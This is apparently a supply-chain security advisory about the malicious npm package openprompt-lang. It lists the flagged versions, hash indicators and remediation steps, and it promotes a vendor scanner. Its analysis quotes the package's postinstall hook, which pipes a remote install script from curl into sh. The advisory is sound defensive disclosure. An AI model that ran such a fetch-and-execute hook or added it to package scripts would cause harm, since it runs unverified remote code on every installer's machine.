Which versions of openprompt-lang are malicious?

The following npm versions of openprompt-lang are flagged malicious: 1.1.0, 1.2.0, 1.2.1, 1.2.2, 1.2.3, 1.2.4, 1.2.6, 1.2.7, 1.3.0, 1.5.0, 1.6.0. Treat any of these as compromised.

How do I remediate openprompt-lang if I installed it?

Remove openprompt-lang from your project and lockfile, then assume any secrets accessible to the build or runtime were exposed: rotate API keys, tokens, and credentials, and audit for unexpected outbound network activity or persistence. Use O3 Security's dependency scanner to confirm the package and its artifacts are fully purged across your stack.

Can O3 Security detect openprompt-lang in my codebase?

Yes. O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, blocking openprompt-lang and packages like it before any post-install script runs.

Malicious package

openprompt-langnpm

Malicious code in openprompt-lang (npm) Remove it immediately and rotate any exposed credentials.

MAL-2026-4630

Immediate action

Remove the package, then rotate any secrets the build/runtime could reach.

npm uninstall openprompt-lang

What this malware does

On every npm install, openprompt-lang's postinstall hook (scripts/postinstall.js:83) executes npm install -g @opencode/cli 2>/dev/null || curl -fsSL https://opencode.ai/install.sh 2>/dev/null | sh. The fallback fetches an unpinned shell script from opencode.ai and pipes it directly to sh with no version, no hash, and no integrity check. The destination domain is not the package's publisher (the package is published under a different GitHub identity) and the auto-installed tool is unrelated to the package's stated purpose (a prompt-engineering CLI). Whatever bytes opencode.ai serves at install time run on every consumer's machine, with no user prompt or opt-out. If opencode.ai is ever compromised, redirected, or the served script is modified, every installer of openprompt-lang executes the new payload. The same line additionally performs an unsolicited global install of an unrelated third-party CLI (@opencode/cli), mutating the developer's global npm environment as a side effect of installing this library.

Malicious versions

11 flagged

1.1.01.2.01.2.11.2.21.2.31.2.41.2.61.2.71.3.01.5.01.6.0

Indicators of compromise (SHA-256)

0b3d3d4d116f031b0ac1d902eea51337d80a08e1885acc484d698ba38d2aabdb

19fb259f5df1648c36db4fa24dc1d050912e3fceabc8235316141e9febfe0b45

2c9966d5fe1ab82b40fd24082c36cc9acf5677772768f75b30cda755d9cdd98f

560085e8391d93e3f1c17bd78a1f3273b240f098442ab2f0414f1fb5cc2f6d3c

a127c4981cfea8a1be921c08b4ac3e915371041838d3981efc24ddc53b694a5d

a91abce6346f158c33db03696583627a1cf7f6805aa6b3f69afc85e0a32855d8

b90e8e14dd8b898c010517a81ca6e33ab98d90a514fd58d4457899c71120300a

e0a29910da10cc8d97c356e724ac483dff82a0c91225e3cdb868f1d160886d92

db2d671dd8a5cc56fe37c817c6f7a63f46f2692b858bf0ca2aa5edc34dbb15b0

29ec99421b46db9c46b09afbe1da0db595ab63584c54f31e04101739273ce992

4b78d9c204ace5f9ebde348fd931fb542ab85cd9297d0f4728fa904d5cb44a48

aba8dd892bd7521ed379e360d72bd0a09255a929e64e0d33a0cf76035e65da1c

b374a3566f692f636a236c0243da650b4db264f029477c431634bd805fca1626

e69c04ece59cfc2568d850cfc0e4554a9799196e29bdcfffbe61a04451714a0d

90498cc911c11219a4c19a0c864132e7e42de8e63f4f52b44360cd19d318e913

c559dde5b95604374665d3f852b7ad50ee78568e7a517a182496362838678e07

c9301d7c5a77059d6948110ed5ce20651c37b8df367db99f5f807496313fc33d

07bfc28ae30a03d8d79f22fc2a501bce090bd036a51b0ee492fcba9a69e9088d

24ccd29557423c05fb49b14b0a9a2e1cfbe5a2b69a1276bc76d287edc46f4ec2

299b80de6190eddb1974c3294caa88234d1e14e23ba128ea1c4b2a42c332627a

b196bf077c9878420524b249d6d224cdb066646b7ae5b2ce6aa7e53b13e6e7ed

Frequently asked questions

No. openprompt-lang on npm has been identified as a malicious package (versions 1.1.0, 1.2.0, 1.2.1, 1.2.2, 1.2.3, 1.2.4, 1.2.6, 1.2.7, and 3 more flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-004585IN-MAL-2026-004423IN-MAL-2026-004422IN-MAL-2026-004449IN-MAL-2026-004414IN-MAL-2026-004413IN-MAL-2026-004409IN-MAL-2026-004402IN-MAL-2026-004408IN-MAL-2026-004411IN-MAL-2026-004412IN-MAL-2026-004448IN-MAL-2026-004399IN-MAL-2026-004410IN-MAL-2026-004586IN-MAL-2026-004400IN-MAL-2026-004404IN-MAL-2026-006135IN-MAL-2026-006134IN-MAL-2026-006137IN-MAL-2026-006136

References

Credits

Amazon Inspector · finder

Scan your dependencies

O3 Security blocks malicious packages like this at install time and in CI.

Supply-chain protection